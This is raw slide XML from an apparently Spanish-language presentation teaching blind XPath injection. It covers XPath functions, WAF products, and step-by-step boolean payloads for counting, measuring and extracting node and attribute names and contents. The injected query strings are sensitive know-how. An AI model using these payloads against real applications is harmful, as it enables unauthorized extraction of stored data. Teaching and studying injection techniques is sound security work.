                </a:solidFill>
              </a:rPr>
              <a:t>asdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="3 Llamada con línea 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681952" y="2169620"/>
            <a:ext cx="2643206" cy="500066"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 103553"/>
              <a:gd name="adj2" fmla="val 68310"/>
              <a:gd name="adj3" fmla="val 263555"/>
              <a:gd name="adj4" fmla="val 71929"/>
            </a:avLst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Llamada con línea 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637056" y="2161546"/>
            <a:ext cx="3786214" cy="500066"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 103553"/>
              <a:gd name="adj2" fmla="val 68310"/>
              <a:gd name="adj3" fmla="val 268855"/>
              <a:gd name="adj4" fmla="val 38099"/>
            </a:avLst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2714612" y="3500438"/>
            <a:ext cx="1357322" cy="642942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="1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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIERTO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357818" y="3500438"/>
            <a:ext cx="1357322" cy="642942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FALSO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="7 O"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4344434" y="3442252"/>
            <a:ext cx="714380" cy="714380"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOr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9" name="8 Llamada con línea 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214678" y="4714884"/>
            <a:ext cx="2940864" cy="928694"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1346"/>
              <a:gd name="adj2" fmla="val 50248"/>
              <a:gd name="adj3" fmla="val -59569"/>
              <a:gd name="adj4" fmla="val 50440"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:alpha val="1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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>¡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estamos dentro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="10 Conector recto"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4071934" y="3799442"/>
            <a:ext cx="285752" cy="158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5058814" y="3799442"/>
            <a:ext cx="285752" cy="15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> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2906713"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm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Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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Nos permite extraer todo el árbol XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Vamos a seguir el siguiente procedimiento:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Extraer el numero de nodos y atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Sacar la longitud de los nodos y los atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Extraer el nombre de los nodos y atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Extraer el contenido de los nodos y los atributos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Consultas “avanzadas” en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>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Seleccionar la raíz del árbol XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Seleccionar todos los elementos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Nodos: //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Nodos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>element</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Comentarios: //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Seleccionar todos los atributos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::* o //@*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Seleccionar el primer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de un nodo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>[1]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disponibles en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath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/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Selecciona el texto contenido dentro de los nodos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(elemento)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Selecciona el nombre de los nodos y atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>position()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve el índice del elemento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>consulta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Cuenta el numero de elementos devueltos por la consulta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>starts-with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>string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Devuelve true si la primera cadena empieza por la segunda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>string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Devuelve true si la primera cadena contiene la segunda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>string-length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>string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Devuelve la longitud de la cadena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WAF (Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Firewall)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1713" y="1487488"/>
            <a:ext cx="6041113" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Productos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>BinarySEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Akami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" strike="sngStrike" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" strike="sngStrike" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Breach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Trustware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>                  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="3 Imagen" descr="binaryse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20755" y="1575716"/>
            <a:ext cx="3620005" cy="905001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 Imagen" descr="akam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63587" y="3014938"/>
            <a:ext cx="2081180" cy="856957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="6 Imagen" descr="breach_logo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3087" y="5294886"/>
            <a:ext cx="1847850" cy="742950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="7 Imagen" descr="TW_CMYK_Master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19081" y="5408235"/>
            <a:ext cx="3268493" cy="643513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Numero total de nodos y atributos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count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cuenta el numero total de nodos y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodos</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(//@*)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cuenta el numero total de atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>p.e.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>2” and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*) &gt; 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> “a”=“b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>2” and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/@*) &gt; 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> “a”=“b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Longitud de nodos y atributos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/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*[position()=X and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>string-length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()) &gt; 0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve la longitud del nodo que este en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>posicion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/@*[position()=X and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>string-length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()) &gt; 0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve la longitud del atributo que este en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>posicion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> X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Reduccion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>charset</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>]/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*[position()=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>contains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(), '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>')]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve cierto si el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> tiene en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>posicion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> un nodo que contiene la cadena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>]/@*[position()=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>contains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(), '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>')]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve cierto si el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> tiene en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>posicion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> un nodo que contiene la cadena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" i="1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Búsqueda binaria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00420" cy="4400568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Sabiendo la longitud y el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> de un elemento se podría reducir el numero de consultas a realizar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="4 Diagrama"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3286116" y="1389517"/>
          <a:ext cx="5715040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Nombre de nodos y atributos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nodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[1]/child::*[position() = 1 and starts-with(name(), ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Devuelve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cierto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primer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empieza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
